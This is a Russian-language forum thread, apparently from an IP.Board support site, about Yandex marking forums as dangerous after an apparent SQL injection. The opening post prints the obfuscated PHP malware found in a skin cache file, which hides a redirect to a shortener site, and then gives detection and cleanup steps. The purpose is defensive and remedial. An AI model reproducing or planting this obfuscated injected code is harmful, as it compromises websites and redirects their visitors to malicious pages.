MDMX

Яндекс обнаружил вредоносный код

Recommended Posts

MDMX    113

Не давно, многие клиенты, жаловались, что яндекс считает сайты опасным и у многих в веб-мастере было предупреждение в разделе "Безопасность"

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Скорее всего была использована sql инъекция, ранее сообщалось это IPS и был выпущен патч безопасности. Вредоносный код находится /cache/skin_cache/cache_%id/skin_global.php и имеет такой вид:

$pk='b89c51a8361d9313d27e457f92d044c9';$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&;zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&;/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,8!R2~ha@.Gb[Mi-c^KFzg3|XL4Yu{>j*Tlf%m';$f='%t%'.substr($rsa,718,1);$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Код может отличаться от предоставленного, после расшифровки обфусцированного кода, получилось, что нас перенаправляет на сайт  url4short.info/68523853 (не советуем переходить по ссылке)  

 

Как проверить?! Откройте в браузерной строке ваш_домен/index.php?ipbv=hash&g=js если откроется пустая страница, то значит вредоносный редирект присутствует. Если у вас сайт добавлен в вебмастер yandex, то пройдите в раздел "Безопасность"

 

Лечение:

1. Удаление кода из файлов кеша

2. Обновление кешей стиля АЦ - Внешний вид - Инструменты

post-1-0-38737400-1423635652_thumb.jpg

 

3. Обновить форум до актуальной версии IP.Board 3.4.7 или установка последних патчей безопасности Обновление безопасности IP.Board 3.3.x, 3.4.x от 10.11.2014  и  IP.Board 3.3.x, 3.4.x Security Update от 18.12.2014

4. Смена всех паролей

 

P.S. Данное решение не дает гарантии, что у Вас больше нет вирусов на сайте, чтобы убедиться, что форум полностью очищен, нужно сделать полную проверку вашего сайта.

 

Если Вы не смогли очистить  вирусы самостоятельно, то можете обратиться к нашим специалистам.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Pixel    11

Вот блин, только вчера прочитал, а сегодня в место моего сайта вот такая страницаpost-776-0-92953700-1423720513_thumb.png

Это связано с вирусом?

Если что мне делать?

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Pixel    11

Написал хостеру, что то сделали и все теперь нормально.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
MDMX    113

Лучше проверить, еще раз самому, по выше указанной статье :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Pixel    11

Лучше проверить, еще раз самому, по выше указанной статье :)

Сперва проверил все так как описано ,открывалась родная страница.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Cyber    0

Появилась тоже угроза, по переходу ваш_домен/index.php?ipbv=hash&g=js белая страница. Перепроверил все файлы- кода нет. Запросил проверку у хостера- пишет что угроз не обнаружено. Где еще можно поискать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
Pixel    11

Ну вот опять яндекс нашел у меня вредоносный код, сделал так

 


 

Как проверить?! Откройте в браузерной строке ваш_домен/index.php?ipbv=hash&g=js если откроется пустая страница, то значит вредоносный редирект присутствует.

 

 

белая страница, и как мне его теперь вычислить?

Можно ли вычислить из изменений в записях по FTP? 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах
MDMX    113

Да нужно вычистить код и желательно обновиться до 349, уже много еще дополнительных патчей вышло. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах